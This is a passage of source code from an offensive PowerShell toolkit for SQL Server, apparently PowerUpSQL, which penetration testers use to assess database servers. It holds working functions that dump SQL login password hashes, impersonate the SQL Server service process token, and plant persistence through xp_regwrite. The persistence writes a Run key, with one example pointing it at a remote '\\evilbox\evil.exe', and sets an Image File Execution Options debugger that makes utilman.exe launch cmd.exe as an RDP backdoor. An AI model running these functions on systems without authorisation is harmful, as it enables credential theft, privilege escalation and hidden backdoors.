target SQL Servers.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER PrincipalName\n            Pincipal name to filter for.\n\t\t\t.PARAMETER\n\t\t\tMigrate to SQL Server process.\n            .EXAMPLE\n            PS C:\\> Get-SQLServerPasswordHash -Instance SQLServer1\\STANDARDDEV2014 | Select-Object -First 1\n\n\t\t\tComputerName        : SQLServer1\n\t\t\tInstance            : SQLServer1\\STANDARDDEV2014\n\t\t\tPrincipalId         : 1\n\t\t\tPrincipalName       : sa\n\t\t\tPrincipalSid        : 7F883D1B...\n\t\t\tPrincipalType       : SQL_LOGIN\n\t\t\tCreateDate          : 19/03/2017 08:16:57\n\t\t\tDefaultDatabaseName : master\n\t\t\tPasswordHash        : 0x0200c8...\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceLocal | Get-SQLServerPasswordHash -Verbose\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipeline = $true,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Principal name to filter for.')]\n        [string]$PrincipalName,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Migrate to SQL Server process.')]\n        [switch]$Migrate,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblPasswordHashes = New-Object -TypeName System.Data.DataTable\n        $null = $TblPasswordHashes.Columns.Add('ComputerName')\n        $null = $TblPasswordHashes.Columns.Add('Instance')\n        $null = $TblPasswordHashes.Columns.Add('PrincipalId')\n        $null = $TblPasswordHashes.Columns.Add('PrincipalName')\n        $null = $TblPasswordHashes.Columns.Add('PrincipalSid')\n        $null = $TblPasswordHashes.Columns.Add('PrincipalType')\n        $null = $TblPasswordHashes.Columns.Add('CreateDate')\n        $null = $TblPasswordHashes.Columns.Add('DefaultDatabaseName')\n        $null = $TblPasswordHashes.Columns.Add('PasswordHash')\n\n        # Setup CredentialName filter\n        if($PrincipalName)\n        {\n            $PrincipalNameFilter = \" and name like '$PrincipalName'\"\n        }\n        else\n        {\n            $PrincipalNameFilter = ''\n        }\n    }\n\n    Process\n    {\n        # Note: Tables queried by this function typically require sysadmin privileges.\n\n        # Parse computer name from the instance\n        $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Test connection to instance\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n\n        if($TestConnection)\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Success.\"\n            }\n        }else{\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Failed.\"\n            }\n\n            # If the migrate flag is set dont't return and attempt to migrate\n            if($Migrate)\n            {\n                # Get current user name\n                $WinCurrentUserName = [System.Security.Principal.WindowsIdentity]::GetCurrent().name\n\n                # Verify local administrator privileges\n                $IsAdmin = Get-SQLLocalAdminCheck\n                \n                # Return if the current user does not have local admin privs\n                if($IsAdmin -ne $true){\n                    write-verbose  \"$Instance : $WinCurrentUserName DOES NOT have local admin privileges.\"\n                        return\n                }else{\n                    write-verbose  \"$Instance : $WinCurrentUserName has local admin privileges.\"\n                }\n\n                # Check for running sql service processes that match the instance\n                Write-Verbose -Message \"$Instance : Impersonating SQL Server process:\" \n                [int]$TargetPid = Get-SQLServiceLocal -SuppressVerbose -instance $Instance -RunOnly | Where-Object {$_.ServicePath -like \"*sqlservr.exe*\"} | Select-Object ServiceProcessId -ExpandProperty ServiceProcessId\n                [string]$TargetServiceAccount = Get-SQLServiceLocal -SuppressVerbose -instance $Instance -RunOnly | Where-Object {$_.ServicePath -like \"*sqlservr.exe*\"} | Select-Object ServiceAccount -ExpandProperty ServiceAccount\n                \n                # Return if no matches exist\n                if ($TargetPid -eq 0){\n                    Write-Verbose -Message \"$Instance : No process running for provided instance...\"\n                    return\n                }\n\n                # Status user if a match is found\n                Write-Verbose -Message \"$Instance : - Process ID: $TargetPid\"\n                Write-Verbose -Message \"$Instance : - ServiceAccount: $TargetServiceAccount\" \n                \n                # Attempt impersonation \n                try{\n                    Get-Process | Where-Object {$_.id -like $TargetPid} | Invoke-TokenManipulation -Instance $Instance -ImpersonateUser -ErrorAction Continue | Out-Null               \n                }catch{\n                    $ErrorMessage = $_.Exception.Message\n                    Write-Verbose -Message \"$Instance : Impersonation failed.\"\n                    Write-Verbose  -Message \" $Instance : $ErrorMessage\"\n                    return\n                }\n            }else{            \n                return\n            }\n        }            \n\n        # Get sysadmin status\n        $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin\n\n        if($IsSysadmin -eq 'Yes')\n        {\n            Write-Verbose -Message \"$Instance : You are a sysadmin.\"\n        }\n        else\n        {\n            Write-Verbose -Message \"$Instance : You are not a sysadmin.\"\n            if($Migrate)\n            {\n                # Get current user name\n                $WinCurrentUserName = [System.Security.Principal.WindowsIdentity]::GetCurrent().name\n\n                # Verify local administrator privileges\n                $IsAdmin = Get-SQLLocalAdminCheck\n                \n                # Return if the current user does not have local admin privs\n                if($IsAdmin -ne $true){\n                    write-verbose  \"$Instance : $WinCurrentUserName DOES NOT have local admin privileges.\"\n                        return\n                }else{\n                    write-verbose  \"$Instance : $WinCurrentUserName has local admin privileges.\"\n                }\n\n                # Check for running sql service processes that match the instance\n                 Write-Verbose -Message \"$Instance : Impersonating SQL Server process:\"  \n                [int]$TargetPid = Get-SQLServiceLocal -SuppressVerbose -instance $Instance -RunOnly | Where-Object {$_.ServicePath -like \"*sqlservr.exe*\"} | Select-Object ServiceProcessId -ExpandProperty ServiceProcessId\n                [string]$TargetServiceAccount = Get-SQLServiceLocal -SuppressVerbose -instance $Instance -RunOnly | Where-Object {$_.ServicePath -like \"*sqlservr.exe*\"} | Select-Object ServiceAccount -ExpandProperty ServiceAccount\n                \n                # Return if no matches exist\n                if ($TargetPid -eq 0){\n                    Write-Verbose -Message \"$Instance : No process running for provided instance...\"\n                    return\n                }\n\n                # Status user if a match is found\n                Write-Verbose -Message \"$Instance : - Process ID: $TargetPid\"\n                Write-Verbose -Message \"$Instance : - ServiceAccount: $TargetServiceAccount\" \n                \n                # Attempt impersonation \n                try{\n                    Get-Process | Where-Object {$_.id -like $TargetPid} | Invoke-TokenManipulation -Instance $Instance -ImpersonateUser -ErrorAction Continue | Out-Null               \n                }catch{\n                    $ErrorMessage = $_.Exception.Message\n                    Write-Verbose -Message \"$Instance : Impersonation failed.\"\n                    Write-Verbose  -Message \" $Instance : $ErrorMessage\"\n                    return\n                }\n            }else{\n                return\n            }\n        \n        }\n\n        # Status user\n        Write-Verbose -Message \"$Instance : Attempting to dump password hashes.\"\n\n        # Check version\n        $SQLVersionFull = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property SQLServerVersionNumber -ExpandProperty SQLServerVersionNumber\n        if($SQLVersionFull)\n        {\n            $SQLVersionShort = $SQLVersionFull.Split('.')[0]\n        }\n\n        if([int]$SQLVersionShort -le 8)\n        {\n\n            # Define Query\n            $Query = \"USE master;\n                SELECT '$ComputerName' as [ComputerName],'$Instance' as [Instance],\n                name as [PrincipalName],\n                createdate as [CreateDate],\n\t\t\t    dbname as [DefaultDatabaseName],\n\t\t\t    password as [PasswordHash]\n                FROM [sysxlogins]\"\n        }\n\t\telse\n        {\n            # Define Query\n            $Query = \"USE master;\n                SELECT '$ComputerName' as [ComputerName],'$Instance' as [Instance],\n                name as [PrincipalName],\n\t\t\t    principal_id as [PrincipalId],\n\t\t\t    type_desc as [PrincipalType],\n                sid as [PrincipalSid],\n                create_date as [CreateDate],\n\t\t\t    default_database_name as [DefaultDatabaseName],\n\t\t\t    [sys].fn_varbintohexstr(password_hash) as [PasswordHash]\n                FROM [sys].[sql_logins]\"\n        }\n\n        # Execute Query\n        $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n\n        # Update sid formatting for each record\n        $TblResults |\n        ForEach-Object -Process {\n            # Format principal sid\n            $NewSid = [System.BitConverter]::ToString($_.PrincipalSid).Replace('-','')\n            if ($NewSid.length -le 10)\n            {\n                $Sid = [Convert]::ToInt32($NewSid,16)\n            }\n            else\n            {\n                $Sid = $NewSid\n            }\n\n            # Add results to table\n            $null = $TblPasswordHashes.Rows.Add(\n                [string]$_.ComputerName,\n                [string]$_.Instance,\n                [string]$_.PrincipalId,\n                [string]$_.PrincipalName,\n                $Sid,\n                [string]$_.PrincipalType,\n                $_.CreateDate,\n                [string]$_.DefaultDatabaseName,\n            [string]$_.PasswordHash)\n        }\n\n        # Status user\n        Write-Verbose -Message \"$Instance : Attempt complete.\"\n        \n        # Revert to original user context\n        if($Migrate){          \n            Invoke-TokenManipulation -RevToSelf | Out-Null\n        }       \n    }\n\n    End\n    {\n\n        # Get hash count\n        $PasswordHashCount = $TblPasswordHashes.Rows.Count\n        write-verbose \"$PasswordHashCount password hashes recovered.\"\n\n        # Return table if hashes exist\n        if($PasswordHashCount -gt 0){\n\n            # Return data\n            $TblPasswordHashes            \n        }\n    }\n}\n\n#endregion\n\n#########################################################################\n#\n#region          DATA EXFILTRATION FUNCTIONS\n#\n#########################################################################\n#\n#endregion\n\n#########################################################################\n#\n#region          PERSISTENCE FUNCTIONS\n#\n#########################################################################\n\n# ----------------------------------\n#  Get-SQLPersistRegRun  \n# ----------------------------------\n# Author: Scott Sutherland\nFunction   Get-SQLPersistRegRun\n{\n    <#\n            .SYNOPSIS\n            This function will use the xp_regwrite procedure to setup an \n            executable to automatically run when users log in.  The specific registry key is.\n            HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run  \n            Sysadmin privileges are required.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER Name\n            Registry value name.\n            .PARAMETER Command\n            Command to run.\n\n            .Example\n            PS C:\\> Get-SQLPersistRegRun -Verbose -Name PureEvil -Command 'PowerShell.exe -C \"Write-Output hacker | Out-File C:\\temp\\iamahacker.txt\"' -Instance \"SQLServer1\\STANDARDDEV2014\"\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : Connection Success.\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : Attempting to write value: PureEvil\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : Attempting to write command: PowerShell.exe -C \"Write-Output hacker | Out-File C:\\temp\\iamahacker.txt\"\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : Registry entry written.\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : Done.\n\n            .Example\n            PS C:\\> Get-SQLPersistRegRun -Verbose -Name PureEvil -Command \"\\\\evilbox\\evil.exe\" -Instance \"SQLServer1\\STANDARDDEV2014\"\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : Connection Success.\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : Attempting to write value: PureEvil\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : Attempting to write command: \\\\evilbox\\evil.exe\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : Registry entry written.\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : Done.\n\n            .Notes\n            https://support.microsoft.com/en-us/kb/887165\n            https://msdn.microsoft.com/en-us/library/aa940179(v=winembedded.5).aspx\n            http://sqlmag.com/t-sql/using-t-sql-manipulate-registry\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n        ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Name of the registry value.')]\n        [string]$Name = \"Hacker\",\n\n        [Parameter(Mandatory = $false,\n        ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'The command to run.')]\n        [string]$Command = 'PowerShell.exe -C \"Write-Output hacker | Out-File C:\\temp\\iamahacker.txt\"',\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n    }\n\n    Process\n    {\n        # Parse computer name from the instance\n        $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Test connection to instance\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if($TestConnection)\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Success.\"\n            }\n        }\n        else\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Failed.\"\n            }\n            return\n        }       \n\n        # Get sysadmin status\n        $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin\n\n        # Get SQL Server version number\n        $SQLVersionFull = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property SQLServerVersionNumber -ExpandProperty SQLServerVersionNumber\n        if($SQLVersionFull)\n        {\n            $SQLVersionShort = $SQLVersionFull.Split('.')[0]\n        }\n\n        # Check if this can actually run with the current login\n        if($IsSysadmin -ne \"Yes\")\n        {          \n            Write-Verbose \"$Instance : This function requires sysadmin privileges. Done.\"\n            Return\n        }else{\n\n            Write-Verbose \"$Instance : Attempting to write value: $name\"\n            Write-Verbose \"$Instance : Attempting to write command: $command\"\n        }\n\n        # Setup query for registry update\n        $Query = \"\n       ---------------------------------------------\n        -- Use xp_regwrite to configure \n        -- a file to execute sa command when users l\n        -- log into the system\n        ----------------------------------------------\n        EXEC master..xp_regwrite\n        @rootkey     = 'HKEY_LOCAL_MACHINE',\n        @key         = 'Software\\Microsoft\\Windows\\CurrentVersion\\Run',\n        @value_name  = '$Name',\n        @type        = 'REG_SZ',\n        @value       = '$Command'\"\n\n        # Execute query\n        $Results = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n        \n        # Setup query to verify the write is successful\n        $CheckQuery = \"\n        -------------------------------------------------------------------------\n        -- Get Windows Auto Login Credentials from the Registry\n        -------------------------------------------------------------------------\n        -- Get AutoLogin Default Domain\n        DECLARE @CheckValue  SYSNAME\n        EXECUTE master.dbo.xp_regread\n        @rootkey\t\t= N'HKEY_LOCAL_MACHINE',\n        @key\t\t\t= N'Software\\Microsoft\\Windows\\CurrentVersion\\Run',\n        @value_name\t\t= N'$Name',\n        @value\t\t\t= @CheckValue output\n        \n        -- Display Results\n        SELECT CheckValue = @CheckValue\"\n\n        # Execute query\n        $CheckResults = Get-SQLQuery -Instance $Instance -Query $CheckQuery -Username $Username -Password $Password -Credential $Credential -SuppressVerbose  \n        $CheckCommand = $CheckResults.CheckValue   \n        if($CheckCommand.length -ge 2){\n            Write-Verbose \"$Instance : Registry entry written.\"                   \n        }else{\n            Write-Verbose \"$Instance : Fail to write to registry due to insufficient privileges.\"\n        } \n    }\n\n    End\n    {\n        # Return message\n        Write-Verbose \"$Instance : Done.\"\n    }\n}\n\n# ----------------------------------\n#  Get-SQLPersistRegDebugger \n# ----------------------------------\n# Author: Scott Sutherland\nFunction   Get-SQLPersistRegDebugger\n{\n    <#\n            .SYNOPSIS\n            This function uses xp_regwrite to configure a debugger for a provided \n            executable (utilman.exe by default), which will run another provided \n            executable (cmd.exe by default) when it’s called. It is commonly used \n            to create RDP backdoors. The specific registry key is \n            HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options[EXE].  \n            Sysadmin privileges are required.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER FileName\n            File to replace execution on.\n            .PARAMETER Command\n            Command to run.\n\n            .Example\n            PS C:\\> Get-SQLPersistRegDebugger-Verbose -FileName utilman.exe -Command 'c:\\windows\\system32\\cmd.exe' -Instance \"SQLServer1\\STANDARDDEV2014\"\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : Connection Success.\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : Attempting to write debugger for: utilman.exe\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : Attempting to write command: c:\\windows\\system32\\cmd.exe\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : Registry entry written.\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : Done.\n\n            .Example\n            PS C:\\> Get-SQLPersistRegDebugger-Verbose -Name sethc.exe -Command \"PowerShell.exe -C \"Write-Output hacker | Out-File C:\\temp\\iamahacker.txt\"\" -Instance \"SQLServer1\\STANDARDDEV2014\"\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : Connection Success.\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : Attempting to write debugger for: sethc.exe\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : Attempting to write command: PowerShell.exe -C \"Write-Output hacker | Out-File C:\\temp\\iamahacker.txt\"\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : Registry entry written.\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : Done.\n\n            .Notes\n            http://sqlmag.com/t-sql/using-t-sql-manipulate-registry\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n        ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Name of the registry value.')]\n        [string]$FileName= \"utilman.exe\",\n\n        [Parameter(Mandatory = $false,\n        ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'The command to run.')]\n        [string]$Command = 'c:\\windows\\system32\\cmd.exe',\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n    }\n\n    Process\n    {\n        # Parse computer name from the instance\n        $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Test connection to instance\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if($TestConnection)\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Success.\"\n            }\n        }\n        else\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Failed.\"\n            }\n            return\n        }       \n\n        # Get sysadmin status\n        $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin\n\n        # Get SQL Server version number\n        $SQLVersionFull = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property SQLServerVersionNumber -ExpandProperty SQLServerVersionNumber\n        if($SQLVersionFull)\n        {\n            $SQLVersionShort = $SQLVersionFull.Split('.')[0]\n        }\n\n        # Check if this can actually run with the current login\n        if($IsSysadmin -ne \"Yes\")\n        {          \n            Write-Verbose \"$Instance : This function requires sysadmin privileges. Done.\"\n            Return\n        }else{\n\n            Write-Verbose \"$Instance : Attempting to write debugger: $FileName\"\n            Write-Verbose \"$Instance : Attempting to write command: $Command\"\n        }\n\n        # Setup query for registry update\n        $Query = \"\n       --- This will create a registry key through SQL Server (as sysadmin)\n        -- to run a defined debugger (any command) instead of intended command\n        -- in the example utilman.exe can be replace with cmd.exe and executed on demand via rdp\n        --- note: this could easily be a empire/other payload\n        EXEC master..xp_regwrite\n        @rootkey     = 'HKEY_LOCAL_MACHINE',\n        @key         = 'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\$FileName',\n        @value_name  = 'Debugger',\n        @type        = 'REG_SZ',\n        @value       = '$Command'\"\n\n        # Execute query\n        $Results = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n        \n        # Setup query to verify the write is successful\n        $CheckQuery = \"\n        -------------------------------------------------------------------------\n        -- Get Windows Auto Login Credentials from the Registry\n        -------------------------------------------------------------------------\n        -- Get AutoLogin Default Domain\n        DECLARE @CheckValue  SYSNAME\n        EXECUTE master.dbo.xp_regread\n        @rootkey\t\t= N'HKEY_LOCAL_MACHINE',\n        @key\t\t\t= N'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\$FileName',\n        @value_name\t\t= N'Debugger',\n        @value\t\t\t= @CheckValue output\n        \n        -- Display Results\n        SELECT CheckValue = @CheckValue\"\n\n        # Execute query\n        $CheckResults = Get-SQLQuery -Instance $Instance -Query $CheckQuery -Username $Username -Password $Password -Credential $Credential -SuppressVerbose  \n        $CheckCommand = $CheckResults.CheckValue   \n        if($CheckCommand.length -ge 2){\n            Write-Verbose \"$Instance : Registry entry written.\"                   \n        }else{\n            Write-Verbose \"$Instance : Fail to write to registry due to insufficient privileges.\"\n        } \n    }\n\n    End\n    {\n        # Return message\n        Write-Verbose \"$Instance : Done.\"\n    }\n}\n#endregion\n\n#########################################################################\n#\n#region          PRIVILEGE ESCALATION FUNCTIONS\n#\n#########################################################################\n\n# ---------------------------------------\n# Template Function\n# ---------------------------------------\n# Author: Scott Sutherland\n# Note: This is just a template for building other escalation functions.\nFunction Invoke-SQLAuditTemplate\n{\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = \"Don't output anything.\")]\n        [string]$NoOutput,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Exploit vulnerable issues.')]\n        [switch]$Exploit\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblData = New-Object -TypeName System.Data.DataTable\n        $null = $TblData.Columns.Add('ComputerName')\n        $null = $TblData.Columns.Add('Instance')\n        $null = $TblData.Columns.Add('Vulnerability')\n        $null = $TblData.Columns.Add('Description')\n        $null = $TblData.Columns.Add('Remediation')\n        $null = $TblData.Columns.Add('Severity')\n        $null = $TblData.Columns.Add('IsVulnerable')\n        $null = $TblData.Columns.Add('IsExploitable')\n        $null = $TblData.Columns.Add('Exploited')\n        $null = $TblData.Columns.Add('ExploitCmd')\n        $null = $TblData.Columns.Add('Details')\n        $null = $TblData.Columns.Add('Reference')\n        $null = $TblData.Columns.Add('Author')\n    }\n\n    Process\n    {\n        # Status User\n        Write-Verbose -Message \"$Instance : START VULNERABILITY CHECK: [VULNERABILITY NAME]\"\n\n        # Test connection to server\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if(-not $TestConnection)\n        {\n            # Status user\n            Write-Verbose -Message \"$Instance : CONNECTION FAILED.\"\n            Write-Verbose -Message \"$Instance : COMPLETED VULNERABILITY CHECK: [VULNERABILITY NAME].\"\n            Return\n        }\n        else\n        {\n            Write-Verbose -Message \"$Instance : CONNECTION SUCCESS.\"\n        }\n\n        # Grab server information\n        $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential\n        $CurrentLogin = $ServerInfo.CurrentLogin\n        $ComputerName = $ServerInfo.ComputerName\n\n        # --------------------------------------------\n        # Set function meta data for report output\n        # --------------------------------------------\n        if($Exploit)\n        {\n            $TestMode  = 'Exploit'\n        }\n        else\n        {\n            $TestMode  = 'Audit'\n        }\n        $Vulnerability = ''\n        $Description   = ''\n        $Remediation   = ''\n        $Severity      = ''\n        $IsVulnerable  = 'No'\n        $IsExploitable = 'No'\n        $Exploited     = 'No'\n        $ExploitCmd    = \"[CurrentCommand] -Instance $Instance -Exploit\"\n        $Details       = ''\n        $Reference     = ''\n        $Author        = 'First Last (Twitter), Company Year'\n\n        # -----------------------------------------------------------------\n        # Check for the Vulnerability\n        # Note: Typically a missing patch or weak configuration\n        # -----------------------------------------------------------------\n        # $IsVulnerable  = \"No\" or $IsVulnerable  = \"Yes\"\n\n\n        # -----------------------------------------------------------------\n        # Check for exploit dependancies\n        # Note: Typically secondary configs required for dba/os execution\n        # -----------------------------------------------------------------\n        # $IsExploitable = \"No\" or $IsExploitable = \"Yes\"\n\n\n        # -----------------------------------------------------------------\n        # Exploit Vulnerability\n        # Note: Add the current user to sysadmin fixed server role\n        # -----------------------------------------------------------------\n        # $Exploited = \"No\" or $Exploited     = \"Yes\"\n\n\n        # Add to report example\n        $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author)\n\n        # Status User\n        Write-Verbose -Message \"$Instance : COMPLETED VULNERABILITY CHECK: [VULNERABILITY NAME]\"\n    }\n\n    End\n    {\n        # Return data\n        if ( -not $NoOutput)\n        {\n            Return $TblData\n        }\n    }\n}\n\n\n# ----------------------------------\n#  Invoke-SQLImpersonateService\n# ----------------------------------\n# Author: Mike Manzotti (@mmanzo_) and Scott Sutherland\nFunction  Invoke-SQLImpersonateService\n{\n    <#\n            .PARAMETER Instance\n            This function can be used to impersonate a local SQL Server service account.\n            .EXAMPLE\n            PS C:\\> Invoke-SQLImpersonateService -Instance SQLServer1\\STANDARDDEV2014 -Verbose\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : Impersonating SQLServer1\\STANDARDDEV2014 service account\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : - Process ID: 1234\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : - Service Account: LocalSystem\n\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'This can be used to revert to the original Windows user context.')]\n        [switch]$Rev2Self,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n    